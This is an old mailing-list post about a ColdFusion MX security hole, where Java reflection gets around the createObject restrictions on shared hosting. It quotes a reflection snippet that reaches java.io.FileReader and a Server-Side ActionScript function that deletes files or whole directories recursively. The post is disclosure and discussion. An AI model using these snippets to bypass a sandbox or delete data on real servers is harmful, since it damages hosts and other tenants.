Hi all.
there's an active thread on the red_sky_beta_administration called "Huge MX
Security Hole!?!?" dealing with the fact that you can access undelying Java
functionality and bypass many security settings in CF.
the main worries stem not from dedicated hosting but hosting in a shared
environment. Is there any CFMX ISP's willing to add their 2c on this? It's
much more than blocking <CFOBJECT> and createObject() since Java reflection
can gain access to (I think) any Java class that JRUN knows.
any comments/thoughts?
cheers
barry.b
===============================
here's some highlights...
It all gets turned into java binary anyway. Doesn't matter what it's coded
in really as long as there is a compiler that understands the lingo.
Restricting createObject won't really have any effect. You can use code
like this on any CFMX server to get access to any Java class:
<cfscript>
s = "";
cls = s.getClass();
fileReaderClass = cls.forName("java.io.FileReader");
</cfscript>
You can do some pretty serious damage with ServerSide ActionScript on a CFMX
server as well, by calling a function like this from within Flash:
//Delete a file, or a whole directory
//if passed a directory path instead of a file path:
function deleteFile(filepath) {
var success = false;
var theFile = new java.io.File(filepath);
var f;
if (theFile.isDirectory()){
var allFiles = theFile.list();
for (var i=0; i < allFiles.length; i++) {
f = theFile.getAbsolutePath() + java.io.File.separator + allFiles[i];
deleteFile(f);
}
}else{
success = theFile.delete();
}
return success;
}
---
You are currently subscribed to cfaussie as: [EMAIL PROTECTED]
To unsubscribe send a blank email to [EMAIL PROTECTED]
MX Downunder AsiaPac DevCon - http://mxdu.com/
